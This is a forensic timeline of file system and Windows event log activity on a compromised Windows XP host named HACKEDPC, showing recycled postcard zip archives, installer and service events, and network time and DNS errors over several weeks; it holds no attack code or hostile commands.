12/17/08 8:21:18 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/18/08 16:33:01 deleted postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive
12/18/08 16:33:01 modified postcard6.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard6.zip ZIP Compressed Archive Match File, Recycled, Archive
12/19/08 15:33:40 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
12/19/08 15:33:40 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
12/22/08 7:35:05 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
12/22/08 7:35:05 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
12/22/08 7:35:05 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
12/22/08 16:25:08 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/22/08 16:25:08 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/23/08 7:54:50 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/23/08 7:54:50 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
12/23/08 7:54:50 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
01/05/09 8:15:17 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive
01/05/09 8:15:19 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive
01/05/09 8:15:19 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive
01/05/09 16:55:57 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
01/05/09 16:55:57 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive
01/05/09 16:55:58 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
01/05/09 16:55:58 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
01/09/09 8:04:12 written SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive
01/09/09 8:04:17 written SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive
01/15/09 16:21:34 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive
01/15/09 16:21:34 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive File, Recycled, Archive
01/30/09 12:08:11 created SAFEBOOT.SCR-13172D99.pf C:\WINDOWS\Prefetch\SAFEBOOT.SCR-13172D99.pf
02/10/09 13:09:24 modified Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx
02/10/09 13:09:24 written Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx
02/10/09 13:09:32 accessed Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx
02/12/09 11:06:59 accessed Underwater Basket Weaving Majors and Minors 0708.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
02/12/09 11:06:59 accessed UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls
02/13/09 7:26:50 modified MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/13/09 7:26:50 written MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/13/09 14:21:10 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -
02/13/09 14:21:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -
02/13/09 14:35:14 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the stopped state. -
02/13/09 14:38:09 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service was successfully sent a start control. -
02/13/09 14:38:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the running state. -
02/13/09 14:38:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service was successfully sent a start control. -
02/13/09 14:38:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service entered the running state. -
02/13/09 14:38:56 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Office Source Engine service entered the stopped state. -
02/13/09 14:38:58 accessed wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:58 accessed xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:58 written wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:58 written xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:59 accessed accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:59 accessed pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:59 written accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:38:59 written pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive
02/13/09 14:49:18 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Installer service entered the stopped state. -
02/13/09 15:11:23 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -
02/13/09 15:11:23 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -
02/13/09 16:31:36 accessed MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/13/09 16:31:36 created MAPPING2.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP655\snapshot\Repository\FS\MAPPING2.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/13/09 16:31:50 accessed wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive
02/13/09 16:33:06 accessed uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive
02/13/09 16:33:24 accessed setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File
02/13/09 16:33:52 logged SysEvent.Evt EVENT ID: 19 EVENT TYPE: INFORMATION EVENT CATEGORY: Installation SID: COMPUTER: HACKEDPC DESCRIPTION: Installation Successful: Windows successfully installed the following update: Windows Malicious Software Removal Tool - February 2009 (KB890830) -
02/13/09 16:34:03 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -
02/16/09 7:43:27 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -
02/16/09 7:43:40 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -
02/16/09 7:43:40 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -
02/16/09 7:44:15 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/16/09 7:44:15 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/16/09 7:44:36 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/16/09 7:44:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/16/09 7:44:45 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -
02/16/09 7:45:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -
02/16/09 7:45:49 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/16/09 7:45:58 modified MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/16/09 7:45:58 written MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/16/09 7:46:48 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -
02/16/09 7:46:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -
02/16/09 7:47:11 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/16/09 7:50:50 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/16/09 7:59:37 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 30 minutes. -
02/16/09 7:59:37 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 29 minutes.;NtpClient has no source of accurate time. -
02/16/09 8:29:38 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 60 minutes. -
02/16/09 8:29:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 59 minutes.;NtpClient has no source of accurate time. -
02/16/09 9:29:40 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 120 minutes. -
02/16/09 9:29:40 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 119 minutes.;NtpClient has no source of accurate time. -
02/16/09 10:10:20 accessed MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/16/09 10:10:20 created MAPPING1.MAP C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP656\snapshot\Repository\FS\MAPPING1.MAP Corel PhotoPAINT Tone Map Misc File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/16/09 11:07:45 created RUNDLL32.EXE-4FF9832D.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4FF9832D.pf
02/16/09 11:29:46 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 240 minutes. -
02/16/09 11:29:46 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 239 minutes.;NtpClient has no source of accurate time. -
02/16/09 11:59:18 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/16/09 12:45:39 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/16/09 12:45:39 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/16/09 13:19:32 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/16/09 15:29:56 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -
02/16/09 15:29:56 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -
02/16/09 16:08:56 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/16/09 16:08:56 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/16/09 16:10:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/16/09 16:59:42 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -
02/17/09 7:46:02 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -
02/17/09 7:46:16 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -
02/17/09 7:46:16 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -
02/17/09 7:46:44 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/17/09 7:46:44 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/17/09 7:46:59 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/17/09 7:46:59 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/17/09 7:47:22 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/17/09 7:47:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/17/09 7:48:17 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/17/09 7:48:17 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/17/09 7:48:21 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
